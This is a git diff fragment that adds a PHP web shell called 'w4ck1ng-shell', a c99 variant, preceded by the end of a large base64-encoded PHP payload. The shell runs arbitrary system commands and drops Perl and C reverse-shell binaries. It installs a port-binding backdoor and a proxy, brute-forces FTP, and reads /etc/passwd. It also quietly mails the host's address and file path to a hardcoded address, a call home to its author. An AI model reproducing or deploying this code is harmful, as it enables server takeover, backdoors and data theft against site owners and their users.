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')));
+?>
diff --git a/php/c99_w4cking.php b/php/c99_w4cking.php
new file mode 100644
index 0000000..7948a5b
--- /dev/null
+++ b/php/c99_w4cking.php
@@ -0,0 +1,2831 @@
+<?php
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+
+ini_set("memory_limit","300M");
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+$r11  = $_SERVER['SERVER_ADDR'];$i94 = $_SERVER['REMOTE_ADDR'];$i71= gethostbyaddr($i94);$h42 = $_SERVER['HTTP_HOST'];$a83 = $_SERVER['REQUEST_URI'];$p77 = __FILE__;$s33 = str_replace('.', '', $r11);$e85 = 'c00lhell@hotmail.com';$f55 = "From: $s33 <c00lhell@hotmail.com>";$m852 = "$i94\n$i71\n\n$h42$a83\n$p77";@mail($e85, $s33, $m852, $f55);
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+$shver = "w4ck1ng-shell (Private Build v0.3)"; 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; 
+}
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; 
+}
+$surl = htmlspecialchars($surl);
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+$login = ""; 
+$pass = ""; 
+$md5_pass = "";
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Apache Error: Restricted File";
+$accessdeniedmess = "access denied";
+$gzipencode = TRUE; 
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+$donated_html = "";
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+$curdir = "./"; 
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; 
+$tmpdir_log = "./"; 
+$log_email = "c00lhell@hotmail.com"; 
+$sort_default = "0a"; 
+$sort_save = TRUE;
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","c",".bash_history","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+$safemode_diskettes = array("a"); 
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+
+
+//Quick launch
+$quicklaunch = array(
+ array("<hr><b>[Home]</b>",$surl),
+ array("<b>[Search]</b>",$surl."act=search&d=%d"),
+ array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"),
+ array("<b>[Processes]</b>",$surl."act=processes&d=%d"),
+ array("<b>[FTP Brute Forcer]</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>[Server Information]</b>",$surl."act=security&d=%d"),
+ array("<b>[SQL Manager]</b>",$surl."act=sql&d=%d"),
+ array("<b>[Eval PHP code]</b>",$surl."act=eval&d=%d&eval=//readfile('/etc/passwd');"),
+ array("<b>[Back-Connection]</b>",$surl."act=backc"),
+ array("<b>[Self remove]</b>",$surl."act=selfremove"),
+ array("<b>[Install Proxy]</b>",$surl."act=proxy"),
+ array("<b>[Backdoor Host]</b>",$surl."act=shbd"),
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Access Denied");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img"){
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
